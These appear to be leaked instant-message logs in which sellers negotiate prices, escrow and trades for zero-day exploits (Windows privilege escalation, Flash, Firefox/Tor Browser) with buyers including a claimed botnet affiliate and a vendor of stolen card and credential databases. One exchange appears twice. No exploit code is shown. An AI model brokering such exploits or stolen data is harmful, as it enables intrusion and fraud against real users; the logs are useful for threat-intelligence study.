491(00:18:20) GOOGLE#ME@jabber.ru: you have right.. yes
492(00:18:34) GOOGLE#ME@jabber.ru: i was stressed with other things and i tought ..
493(00:19:03) kernel12345: how do I know now you not scamming me after I deliver source code ? you show childish actions by saying that
494(00:19:25) kernel12345: makes me nervous and comfortable
495(00:19:26) GOOGLE#ME@jabber.ru: :)
496(00:19:39) GOOGLE#ME@jabber.ru: maybe i show childish but
497(00:19:41) GOOGLE#ME@jabber.ru: i'm serious
498(00:19:56) GOOGLE#ME@jabber.ru: there is no way so you can lose something
499(00:20:05) GOOGLE#ME@jabber.ru: so got the 2k? right?
500(00:20:21) kernel12345: no
501(00:20:25) kernel12345: you are childish
502(00:20:39) kernel12345: you show no intrests first but when it comes to money you talk straight !!!
503(00:21:46) GOOGLE#ME@jabber.ru: bro i look forward to work and pay you
504(00:21:50) GOOGLE#ME@jabber.ru: but if you don't trust me
505(00:21:59) GOOGLE#ME@jabber.ru: can send my payment back
506(00:22:03) GOOGLE#ME@jabber.ru: and i will understand
507(00:22:10) GOOGLE#ME@jabber.ru: you have right...
508(00:22:16) kernel12345: im not sending source code until you finish payment . already 3 hours of talking and after I gone eating you come back with childish actions and im scammer and stuff ??
509(00:22:38) kernel12345: im afraid you gonna scam after I send because you saw that you lost 2k and afraid to lose more
510(00:22:47) GOOGLE#ME@jabber.ru: i will not send nothing more sorry..
511(00:22:50) GOOGLE#ME@jabber.ru: if can't work
512(00:22:54) GOOGLE#ME@jabber.ru: refund my payment
513(00:22:56) GOOGLE#ME@jabber.ru: i will understand
514(00:23:16) kernel12345: what do I get for wasting time ?
515(00:23:19) GOOGLE#ME@jabber.ru: i'm afraid for other reason
516(00:23:35) kernel12345: im afraid to lose my source code
517(00:23:42) kernel12345: finish payment and I send exploit code right now
518(00:23:45) kernel12345: send me your emai;l
519(00:23:46) GOOGLE#ME@jabber.ru: i don't need to lose money because.. i really need
520(00:23:52) GOOGLE#ME@jabber.ru: the bank will take my house
521(00:23:54) GOOGLE#ME@jabber.ru: and..
522(00:23:55) kernel12345: I will not scam
523(00:23:59) GOOGLE#ME@jabber.ru: i was scared
524(00:23:59) kernel12345: im not a scammetr
525(00:24:02) GOOGLE#ME@jabber.ru: for that i invest
526(00:24:04) GOOGLE#ME@jabber.ru: to make money
527(00:24:05) kernel12345: finish payment please !
528(00:24:09) kernel12345: no need to be afraid
529(00:24:15) GOOGLE#ME@jabber.ru: no sorry
530(00:24:17) GOOGLE#ME@jabber.ru: :)...
531(00:24:17) kernel12345: send me your email please so I can send code !
532(00:24:19) GOOGLE#ME@jabber.ru: this is done
533(00:24:21) kernel12345: no ?
534(00:24:25) GOOGLE#ME@jabber.ru: if you want to work with me
535(00:24:35) GOOGLE#ME@jabber.ru: provide what i need then payment
536(00:24:38) kernel12345: you are saying NO and you want me to send you source
537(00:24:39) kernel12345: no
538(00:24:40) GOOGLE#ME@jabber.ru: if not please refund my money
539(00:24:45) GOOGLE#ME@jabber.ru: no
540(00:24:56) GOOGLE#ME@jabber.ru: i want the payment back
541(00:24:56) kernel12345: finish payment and I send code
542(00:25:02) GOOGLE#ME@jabber.ru: :)
543(00:25:08) kernel12345: you waste my time and you want payment back ?
544(00:25:19) GOOGLE#ME@jabber.ru: i told you
545(00:25:23) kernel12345: you are a fucking time waster and a childish person
546(00:25:24) GOOGLE#ME@jabber.ru: if can work with me in this way
547(00:25:24) GOOGLE#ME@jabber.ru: ok
548(00:25:27) GOOGLE#ME@jabber.ru: if not..
549(00:25:32) kernel12345: I will work with you
550(00:25:32) GOOGLE#ME@jabber.ru: sorry
551(00:25:34) kernel12345: but finish payment
552(00:25:40) GOOGLE#ME@jabber.ru: no payment
553(00:25:43) GOOGLE#ME@jabber.ru: sorry
554(00:25:47) kernel12345: no code
555(00:25:48) kernel12345: sorry
556(00:25:53) GOOGLE#ME@jabber.ru: we agreed on other thing
557(00:25:55) GOOGLE#ME@jabber.ru: and now
558(00:25:56) GOOGLE#ME@jabber.ru: :)
559(00:26:02) GOOGLE#ME@jabber.ru: trying to get more money from me
560(00:26:15) GOOGLE#ME@jabber.ru: 2 ways where
561(00:26:24) GOOGLE#ME@jabber.ru: will send exploit and we can work
562(00:26:27) GOOGLE#ME@jabber.ru: ori will send my money back
563(00:26:51) kernel12345: finish payment .. you already show childish on payment and you will not send other payment when I send code
564(00:26:55) kernel12345: you are the loser
565(00:26:56) kernel12345: here
566(00:27:07) kernel12345: you make 2k payment and I send
567(00:27:08) kernel12345: if not
568(00:27:17) GOOGLE#ME@jabber.ru: if not what
569(00:27:17) GOOGLE#ME@jabber.ru: ?
570(00:27:19) kernel12345: I cannot refund . already wasted my time
571(00:27:23) GOOGLE#ME@jabber.ru: :)))
572(00:27:24) GOOGLE#ME@jabber.ru: lol
573(00:27:29) GOOGLE#ME@jabber.ru: go fuck your self
574(00:27:30) GOOGLE#ME@jabber.ru: scammer
575(00:27:32) kernel12345: ok
576(00:27:34) GOOGLE#ME@jabber.ru: you don t have any code
577(00:27:39) GOOGLE#ME@jabber.ru: buy some candles
578(00:27:40) GOOGLE#ME@jabber.ru: from the money
579(00:27:42) GOOGLE#ME@jabber.ru: will need
580(00:27:45) GOOGLE#ME@jabber.ru: from your family
581(00:27:53) kernel12345: bank gonna take your house for 2k ?
582(00:27:55) GOOGLE#ME@jabber.ru: enjoy!
583(00:28:00) kernel12345: how childish
584(00:28:03) kernel12345: so childish
585(00:28:06) GOOGLE#ME@jabber.ru: go fuck your self
586(00:28:11) GOOGLE#ME@jabber.ru: fucking russian
587(00:28:14) kernel12345: thanks for the 2k
588(00:28:17) GOOGLE#ME@jabber.ru: np
589(00:28:19) GOOGLE#ME@jabber.ru: ;)
590(00:28:23) kernel12345: send more please
591(00:28:27) kernel12345: we hungry
592(00:28:27) GOOGLE#ME@jabber.ru: buy candles for your family
593(00:28:29) GOOGLE#ME@jabber.ru: with thismoney
594(00:28:39) kernel12345: I buy dick for your mother
595(00:28:47) kernel12345: fucking stupid hacker
596(00:28:50) kernel12345: can't even hack
597(00:28:55) GOOGLE#ME@jabber.ru has signed off.
598(00:28:57) kernel12345: fuck
599
600
601Conversation with pills@richim.org on Mon Mar 13 16:39:03 2017:
602(2017-03-13 14:49:54) pills@richim.org/1: Привет по ÑкÑпам
603(16:39:14) pills@richim.org has signed on.
604(16:39:43) symlink40: english please
605(16:40:08) pills@richim.org: Rrgarding exploits
606(16:40:22) symlink40: hello
607(16:40:23) symlink40: yes
608(16:40:31) symlink40: firefox. tor browser ?
609
610(16:40:49) pills@richim.org: Flash
611(16:40:59) symlink40: flash infoleak () ?
612(16:41:00) symlink40: yes
613(16:41:02) pills@richim.org: And lpe
614(16:41:15) symlink40: win LPE
615(16:41:23) symlink40: intrestesd in buying ?
616(16:41:27) pills@richim.org: Interested in buying. What proce for flash ans win lpe
617(16:41:34) symlink40: price ?
618(16:41:45) pills@richim.org: Yes what price
619(16:41:53) symlink40: flash 5000$
620LPE 14000$
621(16:42:07) symlink40: I provide long support for LPE for any patch or not working versions
622(16:42:14) symlink40: refund 100%
623(16:42:47) pills@richim.org: What is deal method? Garant of exploit.in?
624(16:42:58) symlink40: escrow accepted
625(16:43:03) symlink40: you trusted buyer ?
626(16:43:41) pills@richim.org: Yed. But what escrow you want?
627(16:43:49) symlink40: any trusted escrow
628(16:43:52) symlink40: no problem for me
629(16:43:59) pills@richim.org: Exploit in?
630(16:44:16) symlink40: but what gurante you have that escrow admin will not take my exploit code and re-sell ?
631(16:44:32) symlink40: your money is safe in escrow by my code can by copied and re-sold to people ?
632(16:44:36) pills@richim.org: He doesnt take code
633(16:44:49) pills@richim.org: He takes my money
634(16:45:04) pills@richim.org: You send code directly
635(16:45:22) pills@richim.org: After money is on hold with escrow
636(16:45:45) symlink40: I understand
637(16:45:59) symlink40: I can take advanced payment
638(16:46:04) symlink40: any price of your choice
639(16:46:10) symlink40: and I send source code
640(16:46:16) symlink40: you verify and pay me rest
641(16:46:24) symlink40: this we earn each other trust
642(16:46:33) symlink40: I like to work on future deals like this
643(16:46:33) pills@richim.org: Пошел нахуй
644(16:46:37) symlink40: english only
645(16:46:39) symlink40: im not russian
646(16:47:09) pills@richim.org: Where yougot these exps?
647(16:47:19) symlink40: I code them
648(16:47:26) symlink40: I develop exploits from scratch
649(16:47:33) symlink40: for clients and specific needs
650(16:49:47) symlink40: so
651(16:49:49) symlink40: ?
652(16:49:54) symlink40: you accept bitcoin payment ?
653(17:06:17) pills@richim.org: I accept but do you accept escrow or prepayment only?
654(17:06:47) symlink40: I accept advanced payment right now if you
655(17:06:48) symlink40: want
656(17:06:57) symlink40: 4000$ or 3000$ ? no problem for me
657(17:07:14) symlink40: you pay small price to proof you have money
658(17:07:19) symlink40: and I send you exploit code
659(17:07:28) symlink40: you verify exploit and send me rest of payment
660
661
662---
663
664
665
666
667
668d.s.@boese-ban.de/Miranda: hi, how much win10 PoC?
669(19:22:36) kernel12345: 14000$ btc
670(19:35:07) d.s.@boese-ban.de: speak russian?
671(19:35:27) kernel12345: no
672(19:35:29) kernel12345: english only
673(19:35:38) kernel12345: you intrested in the windows LPE ?
674(19:35:56) d.s.@boese-ban.de: y
675(19:36:08) kernel12345: buying or just asking ?
676(19:36:15) kernel12345: many people ask and go offline
677(19:37:09) d.s.@boese-ban.de: working with win7, 8, servers?
678(19:37:19) kernel12345: yes
679(19:37:36) kernel12345: supported versions: XP/2003/Vista/2008/W7/2008R2/W8/2012/W8.1/2012R2/W10/2016
680(19:37:49) kernel12345: I just made demo last day on windows server 2012 r2
681(19:38:20) kernel12345: watch this video
682(19:38:21) kernel12345: https://www.sendspace.com/file/hxhw2y
683(19:38:43) d.s.@boese-ban.de: how long u discovered this bug?
684(19:39:15) kernel12345: + 1 month
685(19:39:53) d.s.@boese-ban.de: and what guarantees about MS not fix this bug in 2 weeks?
686(19:40:08) kernel12345: I provide refund
687(19:40:16) kernel12345: and long term support for any patch
688(19:40:22) kernel12345: don't pay full price until you verify
689(19:41:05) d.s.@boese-ban.de: i like ascrow )
690(19:41:24) kernel12345: I live escrow also
691(19:41:38) kernel12345: but what's my guarante that admin will not take my code and re-sell again ?
692(19:41:54) d.s.@boese-ban.de: ok, i nedd to discuss with my partners
693(19:42:09) d.s.@boese-ban.de: need*
694(19:42:19) kernel12345: okl
695(19:42:20) kernel12345: ok
696(19:42:28) kernel12345: take your time !
697(19:43:01) d.s.@boese-ban.de: im working whith dridex team
698(19:43:11) d.s.@boese-ban.de: you know dridex botnet?
699(19:43:25) kernel12345: no
700(19:43:37) d.s.@boese-ban.de: google about dridex )
701(19:43:48) kernel12345: im not into botnet community .. I research for bugs and develop exploits for clients and sell to people
702(19:44:21) d.s.@boese-ban.de: i see
703(19:45:06) d.s.@boese-ban.de: have u old 0day exploits? or this is ur first exploit?
704(19:45:37) kernel12345: I sold different exploits of flash to a companies in middle east/europe
705(19:45:39) kernel12345: no names
706(19:47:08) d.s.@boese-ban.de: legal companies or hackers team?
707(19:48:25) kernel12345: legal companies
708(19:48:39) kernel12345: sometime random buyers working for private clients
709(19:48:39) d.s.@boese-ban.de has signed on.
710(19:49:07) d.s.@boese-ban.de: gpg?
711(19:49:54) kernel12345: gpg ?
712(19:50:12) d.s.@boese-ban.de: -----BEGIN PGP PUBLIC KEY BLOCK-----
713Version: GnuPG v1.4.13 (MingW32)
714
715mQENBFFdq0ABCADQsyuQU/n3iTryltfiHvYygDviLrkX4seyPzBz2saGTJv+oYcI
716+X7ee6mhpVK/j8ax53yv0febhXT1QeyuI2hO/Zoroh76x5uBU4uoqzUXvQZFW7K2
717ELLGHKufkvgPQ9LNHh9/mE2BXaEebMMnGuQrYO8yZgI9LOXR711c1ko6OKIG/qvm
718yf0K4BwLSsfaZKmesopizQraF7aN4zJNFUS+sn8z0ZCJiSJwrDZhek6lqaH/ft2q
719knnn8c71P9630/HZqyrGnCLe+vg3PfjvhGYSweQimF3bj1uDSHXC4fZiBtYynMvL
720KRbWKenvTsN/hELPYWlLnQ06oo2K7sszXGI3ABEBAAG0HGRhcmsgZGFya3kgPGRz
721YWFya0BkYWRhLmNvbT6JATgEEwECACIFAlFdq0ACGwMGCwkIBwMCBhUIAgkKCwQW
722AgMBAh4BAheAAAoJEJID07KQEwqtTDYH/1/VGYlmOkj8jpC5ZiPdtT1WwtqLIdMz
723XV4WqKIb6HCDJiw/I4M2NebJ0ubznoK51HfyWfAUkc22Cc64NByjVA7Anj+F/8fC
724RvamRr7bkfumm0kdt7WwgSKWZa/jePgcQddjoYXNkr/bCvYj9wR2SCWB0yCsbDI0
725WdJNeXzY/XGNFgMRyTGrIX47RT9wrkMKSxl4+3M7cipD/kfVzfyQ9GcDvlgglCI1
726+cS9dojWX9VO5aYYThJLnrCPWwRrPdjd5IAI6iBRlfrISeMY5rRs1liyS3PeFXRI
7274ELvvCdEXsyM00bA7lXTLVLyfsjUNH1aiUN2VnmUpr2kAaqZjlQ2FcW5AQ0EUV2r
728QAEIANojQOMk4XE8fOAV8wxQdG41/2UwcedrlEiRUpTCB/VjjhDJKoIGkqShRPR1
7294ebwbn/PvHRp8ELdmoBlXvbUxf+LA6Ds4/n1B6553UgAw+ZTUdG2AYHvQnWdSfXh
730EssSjaGiYysQObZAZFS+MP/qZOE7FB4FBXJAs+2lHiybV9t3FIDlmjmUsMfcq0EL
731xEmaispzbih4eHEumZrOIpS704LbeZAMUaiRl4XEENiCxgd23Wrn4YsCH/j6Wt7U
732NlZFJIX04lSWN1ak4O7V/zgz0mlJY/WnWR8z/KyNuUkOkfagLLfHwnAUynZQM62o
733tLBGM3KKCJmdYF8EpAoZFNaDUY8AEQEAAYkBHwQYAQIACQUCUV2rQAIbDAAKCRCS
734A9OykBMKrZsrB/9VnLOVgMkuecT2TEtjeiHnhh/uY44v1PjhTTK34j7Lz55UQWwU
735uTdVnMqntPJ5hdPzKO3kiIi4tkNjo+urLLp2asFcc02O8tbrsmIyBGLlfQDyz0dF
736TELtBBonnKk2NwWKO9/ttDLPh54W4WD6KcjOhuz9rGqbEccVzblxhqTlQaYnKePo
737TWxmGPrc4GMu5lzFK8D6iGTvCIEM6bmrQRkk6jIsVfOLCKwUw3AVKHMqMhQdaVO8
738dNz+LfYFScJp61jd8Dl6WMhFNKOw1EO/mG+NWG5Zhp3qrkjivsH6yd45EYz/+rpV
739gslmDg3fkWM6SYpdMc3UVxLfEXsMAKrNzpoK
740=WMIN
741-----END PGP PUBLIC KEY BLOCK-----
742
743(19:51:18) kernel12345: let me know
744(19:51:32) kernel12345: when you fully intrested in buying
745(19:51:37) d.s.@boese-ban.de: ok
746(19:51:45) kernel12345: so we don't waste each other time if you got questions or need something
747(19:51:48) kernel12345: im here to answer
748(19:51:50) kernel12345: thanks sir .
749
750
751
752(02:10:56) Attempting to start a private conversation with dartz@jabber.cz...
753(02:11:00) dartz@jabber.cz has not been authenticated yet. You should authenticate (http://otr-help.cypherpunks.ca/authenticate.php?lang=en) this buddy.
754(02:11:00) Unverified (http://otr-help.cypherpunks.ca/unverified.php?lang=en) conversation with dartz@jabber.cz/Psi+ started.
755(02:11:44) dartz@jabber.cz: hi
756(02:11:59) dartz@jabber.cz: wht do u want ?
757(02:12:04) dartz@jabber.cz: what*
758(02:12:10) symlink40: hello
759(02:12:16) symlink40: you added me or I added you
760(02:12:20) symlink40: I don't remember
761(02:12:24) symlink40: you sell or buy exploits ?
762(02:12:27) dartz@jabber.cz: i added u
763(02:12:41) dartz@jabber.cz: i saw your spam
764(02:12:48) dartz@jabber.cz: i sell cc and pp
765(02:13:08) symlink40: Oh ok
766(02:13:12) symlink40: any buyers for exploits ?
767(02:13:17) dartz@jabber.cz: i don't have exploit yet only unpatched vulnerabilty
768(02:13:26) symlink40: I have browser exploits + windows LPE for all versions
769(02:13:29) dartz@jabber.cz: no sorry if i know someone i'll redirect it to u
770(02:13:38) symlink40: you accept bitcoin payment ?
771(02:13:47) symlink40: I offer 5000$ for every buyer you get me
772(02:13:48) dartz@jabber.cz: something for google chrome with sandbox escape ?
773(02:13:52) symlink40: you want details ?
774(02:13:58) symlink40: there is no chrome sandbox escape
775(02:14:00) dartz@jabber.cz: yep
776(02:14:04) symlink40: is worth 500k
777(02:14:06) symlink40: no one got it
778(02:14:12) dartz@jabber.cz: hum ok
779(02:14:26) symlink40: you can escape by dropping payloads directly without touching file context of chrome
780(02:14:40) symlink40: I have firefox + tor browser RCE exploit
781(02:15:02) dartz@jabber.cz: works for x64 bits ?
782(02:15:40) symlink40: yes
783(02:15:46) symlink40: 32/64 both
784(02:16:14) dartz@jabber.cz: well and does it work for default config meaning javascript disabled ?
785(02:16:18) dartz@jabber.cz: ...
786(02:16:27) symlink40: it works with noscript enable
787(02:16:28) symlink40: https://www.youtube.com/watch?v=uSOCdWdZn2s
788(02:16:30) symlink40: check demo
789(02:16:42) dartz@jabber.cz: ok let's see it
790(02:16:53) dartz@jabber.cz: have u tryed to sell it to zerodium ?
791(02:17:09) symlink40: zeroduim ask to send exploit code with no guarante
792(02:17:15) symlink40: they take 1/2 week to verify
793(02:17:35) symlink40: you want details of firefox/torbrowser exploit ?
794(02:17:40) dartz@jabber.cz: yes
795(02:17:45) symlink40: ok
796(02:17:52) symlink40: I upload to privnote for you
797(02:17:58) symlink40: don't leak
798(02:18:09) dartz@jabber.cz: ok well
799(02:18:16) dartz@jabber.cz: thx
800(02:18:34) symlink40: ok
801(02:18:35) symlink40: here is
802(02:18:36) symlink40: https://privnote.com/SOOw2dsy#oNMWYFwam
803(02:18:49) symlink40: I sell execlusivly to 1 buyer only
804(02:18:54) dartz@jabber.cz: thx
805(02:18:57) symlink40: if you intrtested in can give good price
806(02:19:38) symlink40: firefox = 10k
807tor = 15k
808
809you take 2 exploits I give discounts .. both for 20k payment is btc only
810(02:19:46) dartz@jabber.cz: i want some 0day but in BIND
811(02:20:16) symlink40: bind ?
812(02:20:20) symlink40: explain more
813(02:21:08) dartz@jabber.cz: yes bind server
814(02:21:10) dartz@jabber.cz: for dns
815(02:21:18) symlink40: emm
816(02:21:23) symlink40: I don't have at this moment
817(02:21:31) symlink40: you intrested in firefox tor vulns ?
818(02:22:44) dartz@jabber.cz: i'm interested but i don't have money for it
819(02:22:53) symlink40: how much you got ?
820(02:23:18) dartz@jabber.cz: how much i can spend for it ?
821(02:23:32) dartz@jabber.cz: something like 5k it's ridculous I know
822(02:23:35) dartz@jabber.cz: but i'm not rich :/
823(02:23:44) symlink40: I can give you the firefox for a good price
824(02:23:51) symlink40: you got anything else for trading >
825(02:24:06) symlink40: you can pay 50% and trade something with me
826(02:24:42) dartz@jabber.cz: trading what for exemple ?
827(02:25:26) symlink40: anything that I can make money with
828(02:25:35) symlink40: cc dbs mailists
829(02:25:47) symlink40: how much you got in total of money ?
830(02:26:28) dartz@jabber.cz: hum
831(02:26:45) dartz@jabber.cz: I have 20M database combo of a big website
832(02:26:52) symlink40: fresh ?
833(02:26:59) dartz@jabber.cz: 1M cc but hashed in md5
834(02:27:02) dartz@jabber.cz: yes
835(02:27:10) symlink40: include passwords,ips.emails and names or something else ?
836(02:27:11) symlink40: ok
837(02:27:18) dartz@jabber.cz: full
838(02:27:20) symlink40: how much you sell this db for ?
839(02:27:23) symlink40: good
840(02:27:25) symlink40: I like full
841(02:27:31) dartz@jabber.cz: it was union group concat sqli
842(02:27:38) symlink40: you add price of db to 5k you have
843(02:27:41) symlink40: that makes it ?
844(02:28:08) dartz@jabber.cz: I need to think about that but if it seems interesting
845(02:28:42) symlink40: you said you got 5000$ in btc ?
846(02:28:53) symlink40: how much you selling the 20m db for ?
847(02:29:04) dartz@jabber.cz: not btc i use pcs mastercard
848(02:29:12) dartz@jabber.cz: i don't know^^
849(02:29:21) dartz@jabber.cz: it's clear text password
850(02:29:29) symlink40: I give 2500$ for that 20M database
851(02:29:36) dartz@jabber.cz: hmm
852(02:29:37) symlink40: can you convert to btc ?
853(02:29:42) symlink40: if you can convert to btc
854(02:29:54) dartz@jabber.cz: it takes 1weeks need to find an escrow
855(02:30:13) symlink40: you pay me 5000$ in btc and you give me the db and we work something else like you add some mailists
856(02:30:17) symlink40: and I give you firefox exploit
857(02:30:20) symlink40: looks good ?
858(02:30:33) symlink40: so 5000$ will take time to convert to btc ?
859(02:30:39) dartz@jabber.cz: need to think
860(02:30:43) symlink40: take your time
861(02:30:45) symlink40: no hurry
862(02:31:02) dartz@jabber.cz: i'll contact u when all is ok
863(02:31:03) dartz@jabber.cz: well
864(02:31:03) dartz@jabber.cz: btw i wanted to ask u
865(02:31:24) symlink40: yes ?
866(02:31:41) symlink40: I have other cheap exploits for IE/safari but some of them patched
867(02:31:42) dartz@jabber.cz: i have a lot of freshed database hacked, and i used sentrymba tool for checkng amazon paypal...
868(02:31:49) symlink40: and ?
869(02:32:08) dartz@jabber.cz: and i wanted to know if u have some source code of autoshop
870(02:32:17) dartz@jabber.cz: or something like that ?
871(02:32:20) symlink40: atm
872(02:32:21) symlink40: no
873(02:32:25) symlink40: at this moment
874(02:32:26) symlink40: no
875(02:32:29) dartz@jabber.cz: safari is cve or 0day ?
876(02:32:41) symlink40: cve is public
877(02:32:45) symlink40: but no one got exploit
878(02:32:46) dartz@jabber.cz: hmm ok^^ because i want to sell pp acount and cc
879(02:32:47) symlink40: besides me
880(02:32:51) dartz@jabber.cz: ah :/
881(02:33:02) symlink40: I develop exploits for specific needs for clients
882(02:33:03) dartz@jabber.cz: bypass aslr ?
883(02:33:10) symlink40: fully
884(02:33:13) symlink40: full bypass
885(02:33:16) dartz@jabber.cz: u come from 0day.today i suppose ?
886(02:33:20) dartz@jabber.cz: nice
887(02:33:21) symlink40: can get root on OSX 15.
888(02:33:25) symlink40: I used to sell on the site
889(02:33:27) symlink40: since he got hacked
890(02:33:32) symlink40: I lost 6 0days
891(02:33:35) dartz@jabber.cz: so i know u
892(02:33:42) symlink40: what was your username ?
893(02:34:04) dartz@jabber.cz: are u the guy that founded the 2 critical vulnerability on mysql on 2010 ?
894(02:34:11) symlink40: no
895(02:34:15) symlink40: I don't do webapps
896(02:34:17) dartz@jabber.cz: i don't have account on 0day.today
897(02:34:23) symlink40: most of my work
898(02:34:30) symlink40: is browsers / kernel 0days
899(02:34:32) dartz@jabber.cz: not webapplication but mysql server
900(02:34:36) dartz@jabber.cz: ah well
901(02:34:37) symlink40: no
902(02:34:39) symlink40: not me
903(02:34:46) symlink40: how much time will take you to think ?'
904(02:34:50) dartz@jabber.cz: kernel exploit writing is hard
905(02:34:58) dartz@jabber.cz: 1 weeks i'll reply back
906(02:36:47) symlink40: ok
907(02:36:54) symlink40: if I was offline
908(02:37:01) symlink40: please reply on my email
909(02:37:02) dartz@jabber.cz: i'll sendu PM
910(02:37:07) symlink40: expl.sales1@gmail.com
911(02:37:08) symlink40: ok ?
912(02:37:18) dartz@jabber.cz: ok nice
913(02:37:22) symlink40: and add my new jabber kpwn07@jabb3r.de
914(02:37:49) dartz@jabber.cz: ok well
915(02:38:45) symlink40: thanks
916(02:38:49) symlink40: have good day friend !
917(02:38:52) Private conversation with dartz@jabber.cz/Psi+ lost.
918dartz@jabber.cz is typing...
919
920
921
922
923d.s.@boese-ban.de/Miranda: hi, how much win10 PoC?
924(19:22:36) kernel12345: 14000$ btc
925(19:35:07) d.s.@boese-ban.de: speak russian?
926(19:35:27) kernel12345: no
927(19:35:29) kernel12345: english only
928(19:35:38) kernel12345: you intrested in the windows LPE ?
929(19:35:56) d.s.@boese-ban.de: y
930(19:36:08) kernel12345: buying or just asking ?
931(19:36:15) kernel12345: many people ask and go offline
932(19:37:09) d.s.@boese-ban.de: working with win7, 8, servers?
933(19:37:19) kernel12345: yes
934(19:37:36) kernel12345: supported versions: XP/2003/Vista/2008/W7/2008R2/W8/2012/W8.1/2012R2/W10/2016
935(19:37:49) kernel12345: I just made demo last day on windows server 2012 r2
936(19:38:20) kernel12345: watch this video
937(19:38:21) kernel12345: https://www.sendspace.com/file/hxhw2y
938(19:38:43) d.s.@boese-ban.de: how long u discovered this bug?
939(19:39:15) kernel12345: + 1 month
940(19:39:53) d.s.@boese-ban.de: and what guarantees about MS not fix this bug in 2 weeks?
941(19:40:08) kernel12345: I provide refund
942(19:40:16) kernel12345: and long term support for any patch
943(19:40:22) kernel12345: don't pay full price until you verify
944(19:41:05) d.s.@boese-ban.de: i like ascrow )
945(19:41:24) kernel12345: I live escrow also
946(19:41:38) kernel12345: but what's my guarante that admin will not take my code and re-sell again ?
947(19:41:54) d.s.@boese-ban.de: ok, i nedd to discuss with my partners
948(19:42:09) d.s.@boese-ban.de: need*
949(19:42:19) kernel12345: okl
950(19:42:20) kernel12345: ok
951(19:42:28) kernel12345: take your time !
952(19:43:01) d.s.@boese-ban.de: im working whith dridex team
953(19:43:11) d.s.@boese-ban.de: you know dridex botnet?
954(19:43:25) kernel12345: no
955(19:43:37) d.s.@boese-ban.de: google about dridex )
956(19:43:48) kernel12345: im not into botnet community .. I research for bugs and develop exploits for clients and sell to people
957(19:44:21) d.s.@boese-ban.de: i see
958(19:45:06) d.s.@boese-ban.de: have u old 0day exploits? or this is ur first exploit?
959(19:45:37) kernel12345: I sold different exploits of flash to a companies in middle east/europe
960(19:45:39) kernel12345: no names
961(19:47:08) d.s.@boese-ban.de: legal companies or hackers team?
962(19:48:25) kernel12345: legal companies
963(19:48:39) kernel12345: sometime random buyers working for private clients
964(19:48:39) d.s.@boese-ban.de has signed on.
965(19:49:07) d.s.@boese-ban.de: gpg?
966(19:49:54) kernel12345: gpg ?
967(19:50:12) d.s.@boese-ban.de: -----BEGIN PGP PUBLIC KEY BLOCK-----
968Version: GnuPG v1.4.13 (MingW32)
969
970mQENBFFdq0ABCADQsyuQU/n3iTryltfiHvYygDviLrkX4seyPzBz2saGTJv+oYcI
971+X7ee6mhpVK/j8ax53yv0febhXT1QeyuI2hO/Zoroh76x5uBU4uoqzUXvQZFW7K2
972ELLGHKufkvgPQ9LNHh9/mE2BXaEebMMnGuQrYO8yZgI9LOXR711c1ko6OKIG/qvm
973yf0K4BwLSsfaZKmesopizQraF7aN4zJNFUS+sn8z0ZCJiSJwrDZhek6lqaH/ft2q
974knnn8c71P9630/HZqyrGnCLe+vg3PfjvhGYSweQimF3bj1uDSHXC4fZiBtYynMvL
975KRbWKenvTsN/hELPYWlLnQ06oo2K7sszXGI3ABEBAAG0HGRhcmsgZGFya3kgPGRz
976YWFya0BkYWRhLmNvbT6JATgEEwECACIFAlFdq0ACGwMGCwkIBwMCBhUIAgkKCwQW
977AgMBAh4BAheAAAoJEJID07KQEwqtTDYH/1/VGYlmOkj8jpC5ZiPdtT1WwtqLIdMz
978XV4WqKIb6HCDJiw/I4M2NebJ0ubznoK51HfyWfAUkc22Cc64NByjVA7Anj+F/8fC
979RvamRr7bkfumm0kdt7WwgSKWZa/jePgcQddjoYXNkr/bCvYj9wR2SCWB0yCsbDI0
980WdJNeXzY/XGNFgMRyTGrIX47RT9wrkMKSxl4+3M7cipD/kfVzfyQ9GcDvlgglCI1
981+cS9dojWX9VO5aYYThJLnrCPWwRrPdjd5IAI6iBRlfrISeMY5rRs1liyS3PeFXRI
9824ELvvCdEXsyM00bA7lXTLVLyfsjUNH1aiUN2VnmUpr2kAaqZjlQ2FcW5AQ0EUV2r
983QAEIANojQOMk4XE8fOAV8wxQdG41/2UwcedrlEiRUpTCB/VjjhDJKoIGkqShRPR1
9844ebwbn/PvHRp8ELdmoBlXvbUxf+LA6Ds4/n1B6553UgAw+ZTUdG2AYHvQnWdSfXh
985EssSjaGiYysQObZAZFS+MP/qZOE7FB4FBXJAs+2lHiybV9t3FIDlmjmUsMfcq0EL
986xEmaispzbih4eHEumZrOIpS704LbeZAMUaiRl4XEENiCxgd23Wrn4YsCH/j6Wt7U
987NlZFJIX04lSWN1ak4O7V/zgz0mlJY/WnWR8z/KyNuUkOkfagLLfHwnAUynZQM62o
988tLBGM3KKCJmdYF8EpAoZFNaDUY8AEQEAAYkBHwQYAQIACQUCUV2rQAIbDAAKCRCS
989A9OykBMKrZsrB/9VnLOVgMkuecT2TEtjeiHnhh/uY44v1PjhTTK34j7Lz55UQWwU
990uTdVnMqntPJ5hdPzKO3kiIi4tkNjo+urLLp2asFcc02O8tbrsmIyBGLlfQDyz0dF
991TELtBBonnKk2NwWKO9/ttDLPh54W4WD6KcjOhuz9rGqbEccVzblxhqTlQaYnKePo
992TWxmGPrc4GMu5lzFK8D6iGTvCIEM6bmrQRkk6jIsVfOLCKwUw3AVKHMqMhQdaVO8
993dNz+LfYFScJp61jd8Dl6WMhFNKOw1EO/mG+NWG5Zhp3qrkjivsH6yd45EYz/+rpV
994gslmDg3fkWM6SYpdMc3UVxLfEXsMAKrNzpoK
995=WMIN
996-----END PGP PUBLIC KEY BLOCK-----
997
998(19:51:18) kernel12345: let me know
999(19:51:32) kernel12345: when you fully intrested in buying
1000(19:51:37) d.s.@boese-ban.de: ok
1001(19:51:45) kernel12345: so we don't waste each other time if you got questions or need something
1002(19:51:48) kernel12345: im here to answer
1003(19:51:50) kernel12345: thanks sir .
1004
1005
1006(19:13:47) thewizardofcc@jabbim.com/763849822488928112228510179: hi
1007(19:14:25) thewizardofcc@jabbim.com has signed on.
1008(19:14:43) symlink40: 1+9= ?
1009(19:14:50) thewizardofcc@jabbim.com: 10
1010(19:15:07) thewizardofcc@jabbim.com: what is price for the adobe flash exploit?
1011(19:15:16) symlink40: hello
1012(19:15:22) symlink40: 8000$ btc
1013(19:15:25) symlink40: is a little bit old
1014(19:15:47) thewizardofcc@jabbim.com: detected?
1015(19:15:57) symlink40: no
1016(19:16:00) symlink40: but version is old
1017(19:16:03) symlink40: not patched yet
1018(19:16:20) symlink40: will take me time to resing new shellcodes that's why I left it and dropped price
